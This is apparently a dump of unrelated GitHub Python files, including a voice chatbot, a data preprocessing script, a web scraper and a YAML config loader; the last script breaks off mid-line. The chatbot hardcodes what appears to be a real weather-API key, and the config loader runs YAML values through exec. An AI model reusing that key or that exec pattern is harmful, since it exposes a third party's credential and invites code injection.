+{"seq_id":"8263106299","text":"import argparse\nimport io\nimport sys\nfrom syntaxd.data.conll import conll_to_sentences\nfrom seqp.vocab import Vocabulary\n\n\ndef main():\n    desc = 'Converts a CONLL file to plain text'\n    parser = argparse.ArgumentParser(desc)\n    parser.add_argument('--input', type=str, required=False)\n    parser.add_argument('--word-field', type=int, default=1)\n    parser.add_argument('--vocab', type=str, required=True)\n    args = parser.parse_args()\n\n    input_lines = (io.TextIOWrapper(sys.stdin.buffer, encoding='utf-8')\n                   if args.input is None else open(args.input, encoding='utf-8'))\n\n    with open(args.vocab, encoding='utf-8') as f:\n        vocab = Vocabulary.from_json(f.read())\n\n    unk_token = 
vocab.idx2symbol[vocab.unk_id]\n\n def word_or_unk(w: str):\n return w if w in vocab.idx2symbol else unk_token\n\n for conll_sentence in conll_to_sentences(input_lines):\n sentence_tokens = [word_or_unk(word_fields[args.word_field])\n for word_fields in conll_sentence]\n print(' '.join(sentence_tokens))\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"noe/iterative_expansion_lms","sub_path":"src/syntaxd/data/conll/conll2text.py","file_name":"conll2text.py","file_ext":"py","file_size_in_byte":1100,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"76"} +{"seq_id":"15259295958","text":"import numpy as np\nimport pandas as pd\nimport os\n\nfrom sklearn.preprocessing import LabelEncoder\n\nos.chdir(os.path.abspath(os.getcwd()))\n\nfor data_path in ('data/raw/train_set.csv', 'data/raw/test_set.csv'):\n date_columns = ['checkin', 'checkout']\n df = pd.read_csv(data_path, parse_dates=date_columns)\n df = df.sort_values(by=['utrip_id', 'checkin'])\n\n # Encode features\n for feature in ('affiliate_id', 'city_id', 'hotel_country'):\n le = LabelEncoder()\n le.classes_ = np.load(f'encoders/{feature}_classes.npy', allow_pickle=True)\n df[feature] = le.transform(df[feature].values)\n\n # Take care of dates -> create sin / cos\n for column_name in date_columns:\n df[f'{column_name}_day_of_week_sin'] = np.sin(np.pi * df[column_name].dt.dayofweek / 12)\n df[f'{column_name}_day_of_week_cos'] = np.cos(np.pi * df[column_name].dt.dayofweek / 12)\n df[f'{column_name}_day_sin'] = np.sin(np.pi * df[column_name].dt.day / 62)\n df[f'{column_name}_day_cos'] = np.cos(np.pi * df[column_name].dt.day / 62)\n df[f'{column_name}_month_sin'] = np.sin((np.pi * df[column_name].dt.month - 1) / 22)\n df[f'{column_name}_month_cos'] = np.cos((np.pi * df[column_name].dt.month - 1) / 22)\n df['duration'] = (df.checkout - df.checkin).dt.days\n\n # One-hot encode device_class, booker_country\n for column_name in ('device_class', 'booker_country'):\n df = pd.concat([df, pd.get_dummies(df[column_name])], axis=1)\n df.drop(column_name, inplace=True, axis=1)\n\n # Filter training data to sequences longer than 1\n if data_path == 'data/raw/train_set.csv':\n df['seq_len'] = df['utrip_id'].map(df.groupby('utrip_id').aggregate('size'))\n df = df[df['seq_len'] > 1]\n df.drop('seq_len', axis=1, inplace=True)\n df['destination'] = df['utrip_id'].map(df.groupby('utrip_id').aggregate('city_id').aggregate('last'))\n else:\n test_destinations = pd.read_csv('data/raw/ground_truth.csv')\n df = df.merge(test_destinations[['utrip_id', 'city_id']], on='utrip_id', how='left')\n df = df.rename({'city_id_y': 'destination', 'city_id_x': 'city_id'}, axis=1)\n le = LabelEncoder()\n le.classes_ = np.load(f'encoders/city_id_classes.npy', allow_pickle=True)\n df['destination'] = le.transform(df['destination'].values)\n\n print(df.head().to_string())\n print(df.describe().to_string())\n print(df.dtypes)\n print('='*30)\n os.makedirs('data/processed', exist_ok=True)\n df.to_csv(f'data/processed/{data_path.rsplit(\"/\", 1)[-1]}', index=False)\n","repo_name":"MisterCapi/Booking_reccomendation_model","sub_path":"preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":2582,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"10965932219","text":"# -*- coding: utf-8 -*-\n\nexec(open(\"./xc_model.py\").read()) #FE model generation\nfrom postprocess.serviceability_limit_states import ibc_2018_sls\nfrom colorama import Fore\nfrom colorama 
import Style\r\n\r\n# Solution\r\n# Linear static analysis.\r\nanalysis= predefined_solutions.simple_static_linear(FEcase)\r\n#analysis= predefined_solutions.penalty_modified_newton(FEcase)\r\n\r\ndef getDeflectionLimit(span, ibcLoadCase):\r\n    loadComb= deflectionLoadCombinations[ibcLoadCase]\r\n    dl= ('deadLoad' in loadComb)\r\n    ll= ('liveLoad' in loadComb)\r\n    sl= ('snowLoad' in loadComb)\r\n    wl= ('windLoad' in loadComb)\r\n    return ibc_2018_sls.getDeflectionLimit(span= span, memberType= 'Roof', memberSubType= 'NonPlasterCeiling', deadLoad= dl, liveLoad= ll, snowLoad= sl, windLoad= wl)\r\n\r\n#span= 5.476\r\nspan= 6.906\r\nworstCase= None\r\nworstDeflection= 0.0\r\nfor key in deflectionLoadCombinations:\r\n    loadCaseName= 'SLS'+key\r\n    modelSpace.addLoadCaseToDomain(loadCaseName)\r\n    deflectionLimit= getDeflectionLimit(span, key)\r\n    result= analysis.analyze(1)\r\n    maxDeflection= 0.0\r\n    for l in xcTotalSet.lines:\r\n        for n in l.nodes:\r\n            currentPos= n.getCurrentPos3d(1.0)\r\n            deflection= l.dist(currentPos)\r\n            maxDeflection= max(maxDeflection, deflection)\r\n    maxDeflection*= 1.2\r\n    if(abs(maxDeflection)>worstDeflection):\r\n        worstDeflection= abs(maxDeflection)\r\n        worstCase= loadCaseName\r\n    deflectionOk= (maxDeflection<=deflectionLimit)\r\n    outputStr= 'max. deflection ('+loadCaseName+'): '+str(maxDeflection*1e3)+ ' mm (L/'+str(span/maxDeflection)+') deflection limit: '+ str(deflectionLimit*1e3)+ 'mm (L/'+str(span/deflectionLimit)+') => '\r\n    if(deflectionOk):\r\n        print(Fore.GREEN+outputStr+'OK'+Style.RESET_ALL)\r\n    else:\r\n        print(Fore.RED+outputStr+'KO'+Style.RESET_ALL)\r\n    modelSpace.removeLoadCaseFromDomain(loadCaseName)\r\n    modelSpace.revertToStart()\r\n\r\n# Display worst case.\r\n## Solve (again).\r\nmodelSpace.addLoadCaseToDomain(worstCase)\r\n# Solution\r\n# Linear static analysis.\r\nanalysis= predefined_solutions.simple_static_linear(FEcase)\r\n#analysis= predefined_solutions.penalty_modified_newton(FEcase)\r\nresult= analysis.analyze(1)\r\n# failedNode= modelSpace.locateEquationNumber(269)\r\n# failedPos= failedNode.getInitialPos3d\r\n# print(failedNode.tag, failedPos)\r\n# quit()\r\n\r\n# Graphic stuff.\r\nfrom postprocess import output_handler\r\noh= output_handler.OutputHandler(modelSpace)\r\n\r\n# oh.displayBlocks()#setToDisplay= beamSet)\r\n# oh.displayFEMesh()\r\n#oh.displayLocalAxes(setToDisplay= beamSet)\r\n# oh.displayStrongWeakAxis(setToDisplay= beamSet)\r\n# oh.displayLoads()#setToDisplay= lvlBlindFasciaSet)\r\n# oh.displayReactions(reactionCheckTolerance= 1e-4)\r\noh.displayDispRot(itemToDisp='uZ', defFScale= 10.0)#, setToDisplay= longBeamSet)\r\n# oh.displayIntForcDiag(itemToDisp= 'Mz')#, setToDisplay= beamSet)\r\n#oh.displayIntForcDiag(itemToDisp= 'Qy', setToDisplay= xcTotalSet)\r\n#oh.displayIntForcDiag(itemToDisp= 'Mz', setToDisplay= xcTotalSet)\r\n#oh.displayIntForcDiag(itemToDisp= 'T', setToDisplay= beamSet)\r\n","repo_name":"xcfem/xc_examples","sub_path":"wood_structure/wood_floor_structure/display_deflection.py","file_name":"display_deflection.py","file_ext":"py","file_size_in_byte":2996,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"76"} +{"seq_id":"7165053614","text":"import random\r\nimport json\r\nimport pickle\r\nimport numpy as np\r\nimport speech_recognition\r\nimport pyttsx3 as tts\r\nimport sys\r\nimport datetime\r\nimport time\r\nimport wikipedia\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.chrome.options import 
Options\r\n\r\nrecognizer=speech_recognition.Recognizer()\r\nspeaker=tts.init()\r\nvoices=speaker.getProperty('voices')\r\nspeaker.setProperty('voice',voices[1].id)\r\nspeaker.setProperty('rate',170)\r\ntodo=[]\r\n\r\nimport nltk\r\nfrom nltk.stem import WordNetLemmatizer\r\n\r\nfrom tensorflow.keras.models import load_model\r\n\r\nlemmatizer=WordNetLemmatizer()\r\nintents=json.loads(open('intents.json').read())\r\n\r\nwords=pickle.load(open('words.pkl','rb'))\r\nclasses=pickle.load(open('classes.pkl','rb'))\r\nmodel=load_model('chatbot_model.h5')\r\n\r\nimport requests\r\n\r\napi_key = \"cd1a705e3a5f59b120ec6189e11f810e\"\r\n\r\ndef get_weather(city_name):\r\n    global temp\r\n    api_url = \"http://api.openweathermap.org/data/2.5/weather?q={}&appid={}\".format(city_name, api_key)\r\n\r\n    response = requests.get(api_url)\r\n    response_dict = response.json()\r\n\r\n    weather = response_dict[\"weather\"][0][\"description\"]\r\n    temp=response_dict[\"main\"][\"temp\"]\r\n    temp=\"{:.2f}\".format(temp-273.15)\r\n\r\n    if response.status_code == 200:\r\n        return weather\r\n    else:\r\n        print('[!] HTTP {0} calling [{1}]'.format(response.status_code, api_url))\r\n        return None\r\n\r\nimport spacy\r\nimport requests\r\n\r\nnlp=spacy.load(\"en_core_web_md\")\r\n#nlp=spacy.load(\"en_core_web_sm\")\r\ndef chatbot(statement):\r\n    weather=nlp(\"Current weather in city\")\r\n    statement=nlp(statement)\r\n    min_similarity=0.4\r\n\r\n    if weather.similarity(statement)>=min_similarity:\r\n        for ent in statement.ents:\r\n            if ent.label_ ==\"GPE\":\r\n                city=ent.text\r\n                break\r\n        else:\r\n            res=\"You need to tell me a city to check\"\r\n            return res\r\n\r\n        city_weather=get_weather(city)\r\n        if city_weather is not None:\r\n            res=\"In \"+city+\", the current weather is \"+city_weather+ \" and the temperature is \"+str(temp)+\" °C\"\r\n            return res\r\n        else:\r\n            res=\"something went wrong\"\r\n            return res\r\n    else:\r\n        res=\"sorry i don't understand that\"\r\n        return res\r\n\r\ndef yt(text):\r\n    text = text.lower()\r\n    co = Options()\r\n    co.add_experimental_option(\"detach\", True)\r\n    driver = webdriver.Chrome(r\"C:\\chromedriver.exe\", options=co)\r\n    driver.implicitly_wait(1)\r\n    driver.maximize_window()\r\n    #ind = text.split()[2:]\r\n    speaker.say(\"What do you want to play on Youtube?\")\r\n    speaker.runAndWait()\r\n    ChatLog.config(state=NORMAL)\r\n    ChatLog.insert(END, \"Lyra : What do you want to play on Youtube?\" + '\\n\\n')\r\n    ChatLog.config(state=DISABLED)\r\n    base.update()\r\n    try:\r\n        with speech_recognition.Microphone() as mic:\r\n            recognizer.adjust_for_ambient_noise(mic,duration=0.2)\r\n            audio=recognizer.listen(mic)\r\n            name=recognizer.recognize_google(audio)\r\n            ChatLog.config(state=NORMAL)\r\n            ChatLog.insert(END, \"You : \" + name + '\\n\\n')\r\n            ChatLog.config(state=DISABLED)\r\n            base.update()\r\n            name=name.split()\r\n            driver.get(\"http://www.youtube.com/results?search_query=\" + '+'.join(name))\r\n            res=\"Youtube Opened\"\r\n            return res\r\n    except(speech_recognition.UnknownValueError):\r\n        res=\"Sorry could not understand that\"\r\n        return res\r\n\r\n\r\n\r\ndef clean_up_sentence(sentence):\r\n    sentence_words=nltk.word_tokenize(sentence)\r\n    sentence_words=[lemmatizer.lemmatize(word.lower()) for word in sentence_words]\r\n    return sentence_words\r\n\r\ndef bag_of_words(sentence,words,show_details=True):\r\n    sentence_words=clean_up_sentence(sentence)\r\n    bag=[0]*len(words)\r\n    for w in sentence_words:\r\n        for i, word in enumerate(words):\r\n            if word==w:\r\n                bag[i]=1\r\n\r\n    return(np.array(bag))\r\n\r\ndef 
predict_class(sentence,model):\r\n bow=bag_of_words(sentence,words,show_details=False)\r\n res=model.predict(np.array([bow]))[0]\r\n ERROR_THRESHOLD=0.25\r\n results=[[i,r]for i,r in enumerate(res) if r>ERROR_THRESHOLD]\r\n\r\n results.sort(key=lambda x:x[1],reverse=True)\r\n return_list=[]\r\n for r in results:\r\n return_list.append({'intent':classes[r[0]],'probability':str(r[1])})\r\n return return_list\r\n\r\ndef get_response(intents_list,intents_json):\r\n tag=intents_list[0]['intent']\r\n list_of_intents=intents_json['intents']\r\n for i in list_of_intents:\r\n if i['tag']==tag:\r\n result=random.choice(i['responses'])\r\n break\r\n return result\r\n\r\nfrom PyDictionary import PyDictionary\r\ndict=PyDictionary()\r\n\r\ndef meaning(text):\r\n return dict.meaning(str(text).split()[2])['Noun'][0]\r\n\r\ntodo=[]\r\ndef create_note():\r\n global recognizer\r\n note=\"What do you want to write onto your note?\"\r\n speaker.say(note)\r\n speaker.runAndWait()\r\n ChatLog.config(state=NORMAL)\r\n ChatLog.insert(END, \"Lyra : \" + note + '\\n\\n')\r\n ChatLog.config(state=DISABLED)\r\n base.update()\r\n\r\n done=False\r\n while not done:\r\n try:\r\n with speech_recognition.Microphone() as mic:\r\n recognizer.adjust_for_ambient_noise(mic,duration=1)\r\n audio=recognizer.listen(mic)\r\n note=recognizer.recognize_google(audio)\r\n note=note.lower()\r\n ChatLog.config(state=NORMAL)\r\n ChatLog.insert(END, \"You : \" + note + '\\n\\n')\r\n ChatLog.config(state=DISABLED)\r\n base.update()\r\n\r\n speaker.say(\"Choose a filename\")\r\n speaker.runAndWait()\r\n ChatLog.config(state=NORMAL)\r\n ChatLog.insert(END, \"Lyra : Choose a filename\" + '\\n\\n')\r\n ChatLog.config(state=DISABLED)\r\n base.update()\r\n recognizer.adjust_for_ambient_noise(mic,duration=0.6)\r\n audio=recognizer.listen(mic)\r\n filename=recognizer.recognize_google(audio)\r\n filename=filename.lower()\r\n ChatLog.config(state=NORMAL)\r\n ChatLog.insert(END, \"You : \" + filename + '\\n\\n')\r\n ChatLog.config(state=DISABLED)\r\n base.update()\r\n\r\n with open(filename,'w') as f:\r\n f.write(note)\r\n done=True\r\n res = \"successfully created the note\"\r\n except speech_recognition.UnknownValueError:\r\n res=\"Sorry could not Understand That\"\r\n\r\n return res\r\n\r\ndef add_todo():\r\n speaker.say(\"What todo you want to add\")\r\n speaker.runAndWait()\r\n ChatLog.config(state=NORMAL)\r\n ChatLog.insert(END, \"Lyra : What todo you want to add\" + '\\n\\n')\r\n ChatLog.config(state=DISABLED)\r\n base.update()\r\n\r\n done=False\r\n\r\n while not done:\r\n try:\r\n with speech_recognition.Microphone() as mic:\r\n recognizer.adjust_for_ambient_noise(mic,duration=0.5)\r\n audio=recognizer.listen(mic)\r\n\r\n item=recognizer.recognize_google(audio)\r\n item=item.lower()\r\n todo.append(item)\r\n\r\n speaker.say(\"Do you want to add more todo in the list\")\r\n speaker.runAndWait()\r\n ChatLog.config(state=NORMAL)\r\n ChatLog.insert(END, \"Lyra : Do you want to add more todo in the list\" + '\\n\\n')\r\n ChatLog.config(state=DISABLED)\r\n base.update()\r\n audio=recognizer.listen(mic)\r\n ans=recognizer.recognize_google(audio)\r\n ChatLog.config(state=NORMAL)\r\n ChatLog.insert(END, \"You : \" + ans + '\\n\\n')\r\n ChatLog.config(state=DISABLED)\r\n base.update()\r\n if 'yes' in ans:\r\n done=False\r\n else:\r\n done=True\r\n res = \"Todos added in the list\"\r\n except speech_recognition.UnknownValueError:\r\n res=\"Sorry could not Understand That\"\r\n return res\r\n\r\ndef show_todo():\r\n ChatLog.config(state=NORMAL)\r\n 
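# post the list header to the chat window before speaking each todo item\r\n    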
ChatLog.insert(END, \"Lyra : The items on your list are\" + '\\n')\r\n #ChatLog.config(state=DISABLED)\r\n speaker.say(\"The items on your list are \")\r\n for item in todo:\r\n speaker.say(item)\r\n #ChatLog.config(state=NORMAL)\r\n ChatLog.insert(END, \"Lyra : \" + item + '\\n\\n')\r\n ChatLog.config(state=DISABLED)\r\n speaker.runAndWait()\r\n\r\n\r\n\r\n\r\n\r\nprint(\"Bot is Running\")\r\ndef chatbot_res(text):\r\n intents_list = predict_class(text, model)\r\n if intents_list[0]['intent']=='weather':\r\n res=chatbot(text)\r\n print('weather')\r\n speaker.say(res)\r\n speaker.runAndWait()\r\n return res\r\n elif 'search' in text:\r\n text=text.lower()\r\n #text = text.replace(\"search\", \"\")\r\n co = Options()\r\n co.add_experimental_option(\"detach\", True)\r\n driver = webdriver.Chrome(r\"C:\\chromedriver.exe\", options=co)\r\n driver.implicitly_wait(1)\r\n driver.maximize_window()\r\n indx = text.split().index(\"search\")\r\n ind = text.split()[indx + 1:]\r\n driver.get(\"https://www.google.com/search?client=firefox-b-d&q=\"+'+'.join(ind))\r\n print(\"https://www.google.com/search?client=firefox-b-d&q=\"+'+'.join(ind))\r\n speaker.say(\"Opened website\")\r\n speaker.runAndWait()\r\n return (\"searched \"+text)\r\n elif intents_list[0]['intent']=='meaning':\r\n res=meaning(text)\r\n speaker.say(res)\r\n speaker.runAndWait()\r\n return res\r\n elif 'time' in text:\r\n res=datetime.datetime.now().strftime(\"%H:%M:%S\")\r\n speaker.say(f\"The time is {res}\")\r\n speaker.runAndWait()\r\n return res\r\n elif intents_list[0]['intent']=='song':\r\n res=yt(text)\r\n speaker.say(res)\r\n speaker.runAndWait()\r\n return res\r\n elif intents_list[0]['intent']=='createnote':\r\n res=create_note()\r\n return res\r\n elif intents_list[0]['intent']=='addtodo':\r\n res=add_todo()\r\n return res\r\n elif intents_list[0]['intent']=='showtodo':\r\n res=show_todo()\r\n return res\r\n elif intents_list[0]['intent']=='bye':\r\n res=get_response(intents_list,intents)\r\n speaker.say(res)\r\n speaker.runAndWait()\r\n ChatLog.config(state=NORMAL)\r\n #ChatLog.insert(END, \"You : \" + text + '\\n\\n')\r\n\r\n ChatLog.insert(END, \"Lyra : \" + res + '\\n\\n')\r\n ChatLog.config(state=DISABLED)\r\n base.update()\r\n time.sleep(4)\r\n base.destroy()\r\n\r\n else:\r\n res = get_response(intents_list, intents)\r\n speaker.say(res)\r\n speaker.runAndWait()\r\n return res\r\n\r\n\r\nimport tkinter\r\nfrom tkinter import *\r\nfrom PIL import Image,ImageTk\r\n\r\ndef send():\r\n msg=EntryBox.get(\"1.0\",'end-1c').strip()\r\n EntryBox.delete(\"0.0\",END)\r\n\r\n if msg!='':\r\n ChatLog.config(state=NORMAL)\r\n ChatLog.insert(END,\"You : \"+msg+'\\n\\n')\r\n\r\n ChatLog.config(foreground=\"#442265\",font=(\"Verdana\",12))\r\n ChatLog.config(state=DISABLED)\r\n base.update()\r\n res=chatbot_res(msg)\r\n ChatLog.config(state=NORMAL)\r\n ChatLog.insert(END,\"Lyra : \"+res+'\\n\\n')\r\n ChatLog.config(state=DISABLED)\r\n ChatLog.yview(END)\r\n\r\ndef micsend():\r\n global res,msg,msg1\r\n with speech_recognition.Microphone() as mic:\r\n recognizer.adjust_for_ambient_noise(mic,duration=0.2)\r\n print(\"say anything\")\r\n audio=recognizer.listen(mic)\r\n try:\r\n msg=recognizer.recognize_google(audio)\r\n ChatLog.config(state=NORMAL)\r\n ChatLog.insert(END, \"You : \" + msg + '\\n\\n')\r\n ChatLog.config(state=DISABLED)\r\n base.update()\r\n res = chatbot_res(msg)\r\n\r\n except:\r\n speaker.say(\"Sorry could not understand that\")\r\n speaker.runAndWait()\r\n msg=\"Sorry could not Understand That\"\r\n\r\n if 
msg==\"Sorry could not Understand That\":\r\n res=msg\r\n ChatLog.config(state=NORMAL)\r\n #ChatLog.insert(END, \"You : \" + msg + '\\n\\n')\r\n ChatLog.config(foreground=\"#442265\", font=(\"Verdana\", 12))\r\n ChatLog.insert(END, \"Lyra : \" + res + '\\n\\n')\r\n ChatLog.config(state=DISABLED)\r\n ChatLog.yview(END)\r\n\r\n\r\nimport tkinter\r\nfrom tkinter import *\r\nfrom PIL import Image,ImageTk\r\nbase=Tk()\r\nbase.title(\"LYRA\")\r\nbase.geometry(\"500x550\")\r\nbase.resizable(width=False,height=False)\r\n#bg=ImageTk.PhotoImage(file=\"img.png\")\r\nbg1=Image.open(\"img2.jpg\")\r\nresi=bg1.resize((500,530),Image.ANTIALIAS)\r\nbg1=ImageTk.PhotoImage(resi)\r\n\r\nbg=Image.open(\"img3.png\")\r\nresize=bg.resize((200,330),Image.ANTIALIAS)\r\nbg=ImageTk.PhotoImage(resize)\r\n\r\nmicb=Image.open(\"mic.jpg\")\r\nresiz=micb.resize((80,80),Image.ANTIALIAS)\r\nmicb=ImageTk.PhotoImage(resiz)\r\n\r\ncanvas=Canvas(base,width=40,height=20)\r\ncanvas.pack(expand=True,fill=BOTH)\r\n#canvas.create_image(0,0,image=bg1,anchor=\"nw\")\r\n#canvas.create_image(295,60,image=bg,anchor=\"nw\")\r\nbg2=Image.open(\"bg.jpg\")\r\nre=bg2.resize((500,600),Image.ANTIALIAS)\r\nbg2=ImageTk.PhotoImage(re)\r\ncanvas.create_image(0,0,image=bg2,anchor=\"nw\")\r\n\r\n\r\nChatLog=Text(base,bd=0,bg=\"#e6e2c1\",height=\"8\",width=\"40\",font=\"Arial\")\r\n\r\nChatLog.config(state=DISABLED)\r\n\r\nscrollbar=Scrollbar(base,command=ChatLog.yview,cursor=\"heart\")\r\nChatLog['yscrollcommand']=scrollbar.set\r\n\r\n\r\nsendbutton=Button(base,font=(\"Arial Black\",15,'bold'),text=\"Send\",width='9',height=5,bd=0,bg=\"#c9b940\",activebackground='#2c12c4',fg=\"#b80920\",command=send)\r\n\r\nmicbutton=Button(base,image=micb,font=(\"Arial Black\",12),text=\"Mic\",width='55',height=5,bg=\"#f5e5ab\",bd=2,activebackground='#91e4e6',fg='#cf1d38',command=micsend)\r\n\r\nEntryBox=Text(base, bd=0,bg='#e6e2c1',width='29',height='5',font='Arial')\r\n\r\n\r\nscrollbar.place(x=450,y=60,height=330)\r\nChatLog.place(x=67,y=60,height=330,width=375)\r\nEntryBox.place(x=200,y=411,height=90,width=265)\r\nsendbutton.place(x=60,y=411,height=90)\r\nmicbutton.place(x=240,y=10,height=50)\r\n\r\nbase.mainloop()","repo_name":"rani1040/AI_CHAT_BOT","sub_path":"chatbot.py","file_name":"chatbot.py","file_ext":"py","file_size_in_byte":14105,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"39013295233","text":"import json\nimport subprocess\nfrom glob import glob\n\nimport app\nfrom app.src import confighelpers as Configurer\nfrom app.src.constants import Nginx_Dir_Type\n\n\ndef main(args=None):\n n_version, n_args, n_dir_type = Configurer.get_nginx_details()\n if n_dir_type == Nginx_Dir_Type.light:\n n_dir = \"%s/conf.d\" % n_args.prefix\n else:\n n_dir = \"%s/sites-available\" % n_args.prefix\n\n registered_configs = json.dumps(\n glob(\"%s/*.lm.conf*\" % n_dir),\n indent=4,\n sort_keys=True\n )\n\n print(\n '''\n%s: %s\n\nRegistered configs:\n%s\n\nEnvironment details:\n%s\n''' % (\n app.name,\n app.version,\n registered_configs,\n json.dumps((n_version, vars(n_args)), indent=4, sort_keys=True)\n )\n )\n","repo_name":"Cloudxtreme/nginx-lm","sub_path":"app/src/commands/info.py","file_name":"info.py","file_ext":"py","file_size_in_byte":780,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"15423012132","text":"import requests\nimport bs4\nfrom lxml import html\n\nclass StatSalt:\n\n sportWebsiteMap = {\n \"siteHomePage\" : 
\"https://statsalt.com\",\n \"ncaab\" : \"https://statsalt.com/games/ncaab/\",\n \"nfl\" : \"https://statsalt.com/games/nfl/\",\n \"nba\" : \"https://statsalt.com/games/nba/\"\n }\n\n def __init__(self, sport):\n self.currentSportWebsite = self.sportWebsiteMap[sport]\n self.pageRequest = requests.get(self.currentSportWebsite)\n self.pageTree = html.fromstring(self.pageRequest.content)\n\n \n def getPrediction(self, team1, team2):\n predictionSiteLink = self.getPredictionSiteLink(team1, team2)\n\n if not predictionSiteLink:\n return \"Not a valid game\"\n\n predictions = self.getAllAvailablePredictions(predictionSiteLink)\n\n return predictions\n\n\n def getPredictionSiteLink(self, team1, team2):\n rowOfGamesElem = self.pageTree.xpath('//*[@id=\"cards\"]')\n #it seems that this set below isnt needed here because only 1 link per team is being found\n # potentialGameLinks = set()\n\n correctLink = \"\"\n \n for x in rowOfGamesElem:\n links = x.iterlinks()\n\n for i in links:\n if (team1 in i[2]) and (team2 in i[2]) and (i[2][0:5] == \"https\"):\n correctLink = i[2]\n break\n\n return correctLink\n\n \n def getAllAvailablePredictions(self, predictionSiteLink):\n pageRequest = requests.get(predictionSiteLink)\n pageTree = html.fromstring(pageRequest.content)\n \n #this finds all div classes named \"pick\" and returns a list of its children element\n pickClassElemList = pageTree.find_class(\"pick\")\n predictions = []\n\n #we have to go 2 layers of children down for this website, to find the actual predictions\n for curElem in pickClassElemList:\n parent = curElem.getparent()\n currentBetType = parent.find('h5').text # returns the bet type\n \n for curPrediction in curElem.getchildren():\n for curPredChild in curPrediction.getchildren():\n prediction = currentBetType + ': ' + curPredChild.text\n predictions.append(prediction.strip().lower())\n \n return predictions\n","repo_name":"JeffSandov6/GamePredictionsScanner","sub_path":"Websites/StatSalt.py","file_name":"StatSalt.py","file_ext":"py","file_size_in_byte":2316,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"16020512167","text":"import numpy as np\r\n\r\ndef isPrime(n):\r\n if n < 2:\r\n return False\r\n \r\n if n==2:\r\n return True\r\n\r\n if not n & 1:\r\n return False\r\n \r\n for x in range(3,int(n**.5)+1,2):\r\n if n%x==0:\r\n return False \r\n return True\r\nk=0\r\nprim=1\r\nwhile k<=10000:\r\n prim+=1\r\n if isPrime(prim):\r\n k+=1\r\n \r\nprint(prim)","repo_name":"JesperDramsch/ProjectEuler","sub_path":"A007.py","file_name":"A007.py","file_ext":"py","file_size_in_byte":397,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"35760905011","text":"import yaml\n\n\nclass Configuration(object):\n def __init__(self, cfg):\n with open(cfg, 'r') as f:\n docs = yaml.load_all(f)\n for idx in docs:\n for key, value in idx.items():\n if key == 'training':\n for k1, v1, in value.items():\n cmd = 'self.' 
+ k1 + '=' + repr(v1)\n exec(cmd)\n f.close()\n\n \n\n# if __name__ == '__main__':\n# c = Configuration('/home/sarthak/als_aai/cfg.yaml')\n# print(c.hyperparameters)\n","repo_name":"sarthaxxxxx/AAI-ALS","sub_path":"utils/config_tool.py","file_name":"config_tool.py","file_ext":"py","file_size_in_byte":559,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"22109163153","text":"def is_prime(n):\r\n count = 0\r\n for i in range(1, n + 1):\r\n if n % i == 0:\r\n count += 1\r\n if count == 2:\r\n return \"YES\"\r\n return \"NO\"\r\n\r\nn = int(input())\r\nprint(is_prime(n))","repo_name":"QuocVinhVKU/BaitapPython","sub_path":"Bai21_tinhNguyenTo.py","file_name":"Bai21_tinhNguyenTo.py","file_ext":"py","file_size_in_byte":209,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"19761293489","text":"from turtle import *\n\nspeed('slowest')\n\n# Turning the turtle to face upwards\nrt(-90)\n\n# The acute angle between\n# the Y's base and branch\nangle = 30\n\n\n# Function to plot a Y\ndef plot_y(size, level):\n\n if level > 0:\n\n colormode(255)\n\n # Splitting the rgb range for green\n # into equal intervals for each level\n # Setting the color according\n # to the current level\n pencolor(0, 255//level, 0)\n\n # Drawing the base\n fd(size)\n rt(angle)\n\n # Recursive call for the right subtree\n plot_y(0.8 * size, level-1)\n\n pencolor(0, 255//level, 0)\n\n lt(2 * angle)\n\n # Recursive call for the left subtree\n plot_y(0.8 * size, level-1)\n\n pencolor(0, 255//level, 0)\n\n rt(angle)\n fd(-size)\n\n\nplot_y(80, 8)\n\n","repo_name":"kauasales/lpc","sub_path":"turtle/tree.py","file_name":"tree.py","file_ext":"py","file_size_in_byte":816,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"9313640197","text":"# evaluation\n# @dlei5\n# calculate accuracy and recall\n\nimport sys\nfrom collections import defaultdict\nfrom collections import deque\n\ndef checkAncesterCorrect(child, ancestor):\n if child not in child2parent:\n return False\n \n if child2parent[child] == ancestor:\n return True\n \n return checkAncesterCorrect(child2parent[child], ancestor)\n \ndef permute(edges):\n permuted_edges = defaultdict(set)\n for c, pset in edges.items():\n permuted_edges[c].union(pset)\n \n stack = list(pset)\n while len(stack):\n pp = stack.pop()\n if pp in edges:\n stack += edges[pp]\n permuted_edges[c].add(pp)\n \n return permuted_edges\n\n\ndef readEdgesToSet(fileName):\n dic = defaultdict(set)\n with open(fileName) as fin:\n for line in fin:\n line = line.strip()\n segs = line.split(\"\\t\")\n\n parent = segs[0]\n child = segs[1]\n dic[child].add(parent)\n \n return dic\n\ndef calcTotal(values):\n total = 0\n for v in values:\n total += len(v)\n return total\n\ndef eval(pred, gold):\n correct = 0\n for c, p in pred.items():\n if c in gold:\n correct += len(p & gold[c]) #intersect(p, gold[c])\n \n print(\"correct:\", correct / calcTotal(pred.values()))\n print(\"recall:\", correct / calcTotal(gold.values()))\n\n \nif __name__ == \"__main__\":\n\n if len(sys.argv) < 4:\n print(\"usage: python eval.py $DATANAME $GOLD_TAXONOMY_EDGE_FILE $PRED_TAXONOMY_EDGE_FILE\")\n # print(\"example: python generateEdges.py dblpv2 dblpv2-l3/taxonomy_test_new_hiexpan_iter_1_postprune.txt\")\n\n data = sys.argv[1]\n goldFile = sys.argv[2]\n predFile = sys.argv[3]\n \n dataDir = '../../data/' + data + '/results/'\n\n # readin correct edges\n pred = 
